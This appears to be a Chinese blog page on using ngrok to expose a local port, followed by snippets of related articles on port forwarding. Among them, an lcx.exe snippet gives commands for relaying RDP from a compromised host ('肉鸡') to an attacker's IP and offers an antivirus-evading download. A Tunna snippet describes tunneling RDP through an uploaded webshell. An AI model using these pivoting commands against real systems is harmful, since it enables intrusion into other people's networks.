内网转发ngrok的使用

1、下载解压ngrok:https://ngrok.com/download

2、执行ngrok会打开控制台

3、输入命令,开始映射本地的8080端口

ngork http 8080

控制台会返回一个url,该url就是映射到你电脑的8080端口。

每次重启ngrok或电脑,返回的url都是随机的。

有部分教程说注册获得token,有了token就允许自定义三级域名,但我尝试了提示需要付费才允许自定义三级域名。

时间: 2024-10-21 04:08:24

内网转发ngrok的使用的相关文章

外网訪问内网工具ngrok tunnel 用法

在软件开发測试过程中.我们会常常遇到须要站点部署測试或者给客户演示这种需求.通常的做法是申请一个域名和空间,将站点放到外网上给客户演示. 这样的方法确实可行只是会有两点不好,第一是添加了开支.二是出现故障须要如今自己电脑上改好bug又一次上传到外网. 那么问题来了,有没有一种简单的方法,让客户之间訪问开发人员的电脑上的站点?答案就是以下我将要为大家介绍的外网訪问内网工具ngrok tunnel 的用法. tunnel能够让公网訪问内网部署的网站,对于软件开发測试非常有帮助. 因为国外官网常常被墙

外网访问内网工具ngrok tunnel 使用方法

在软件开发测试过程中,我们会经常遇到需要网站部署测试或者给客户演示这样的需求.通常的做法是申请一个域名和空间,将网站放到外网上给客户演示. 这种方法确实可行不过会有两点不好,第一是增加了开支,二是出现问题需要现在自己电脑上改好bug重新上传到外网. 那么问题来了,有没有一种简单的方法,让客户之间访问开发者的电脑上的网站?答案就是下面我将要为大家介绍的外网访问内网工具ngrok tunnel 的使用方法. tunnel可以让公网访问内网部署的站点,对于软件开发测试很有帮助. 由于国外官网经常被墙(

映射-外网访问内网服务-ngrok和cisco路由做映射

一:软件解决 软件下载地址: https://ngrok.com/download ngrok-stable-windows-amd64.zip 使用: cmd ---CD..切换到软件目录 ngrok.exe 在弹出框输入:ngrok http 80   (80或者其他端口号,根据实际情况) 二:cisco路由做映射 步骤如下 登陆cisco en ,config 查看配置   show run 固定IP: ip nat inside source static tcp 10.10.1.253

Linux渗透+SSH内网转发

http://www.jb51.net/hack/58514.html http://blog.chinaunix.net/uid-756931-id-353243.html http://blog.163.com/czg_e/blog/static/46104561201552423342331?ignoreua http://www.noah.org/wiki/SSH_tunnel http://www.myhack58.com/Article/60/63/2013/38396_3.htm

golang爬坑:一个简单的http内网转发

最近有一个需求,就是需要从内网服务器的一个端口请求数据,问题是这个内网端口不能被外网访问到,所以需要做一个转发代理服务.原理就是当请求到达时,将本机的地址替换成目标地址,然后其他格式不变,待目标请求返回后,又将目标的报文头及报文返回给客户端.具体代码如下: func main() { localHost := "127.0.0.1:9001" targetHost := "127.0.0.1:8001" httpsServer(localHost, targetHo

lcx.exe内网转发命令教程 + LCX免杀下载

作者: 小健 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 127.0.0.1:3333 今天刚刚第一次使用,特此共享! 另外提供我的免杀lcx.exe 提供给大家下载. 下载是:http://www.xi

Tunna内网转发

使用方法: 上传源码包中文件夹webshell下的脚本至网站目录,然后本地进行连接上传的webshell即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -r 3389 -v 这样就转发了webshell所在主机的3389到你本地的1234上,本地直接远程127.0.0.1:1234即可 python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389

[Linux] SSH内网转发

有这样一个场景:kali 内网虚拟机CentOS7.3 阿里云外网机本机win7 模拟受害者 11月份有爆出过Office的一个关于公式编辑器的漏洞(CVE-2017-11882),参考复现过程可以参考我的另一篇文章,通常为了验证漏洞,我们会在本地测试该漏洞是否确实可以利用.我们在虚拟机测试的环境局限于内网,如果我想发给外网的一个朋友,他打开这个word文档,我就可以在kali机获取到一个session. 大致流程:1.我们事先生成恶意word文档,并在kali下打开msf,监听4444端口,等

SSH 内网端口转发实战

导读 大家都知道SSH是一种安全的传输协议,用在连接服务器上比较多.不过其实除了这个功能,它的隧道转发功能更是吸引人. 如果两个内网之间的linux服务器需要互相登录,或需要互相访问内网某个端口,担忧没有公网IP,可以使用的方法有ngrok(https://ngrok.com/),但并不方便,我们只需两条 SSH 命令即可. 先给出本文主角,两条SSH命令: 远程端口转发(由远程服务器某个端口转发到本地内网服务器端口) ssh   -CfNg  -R(命令行的关键)   2222(远程服务器端口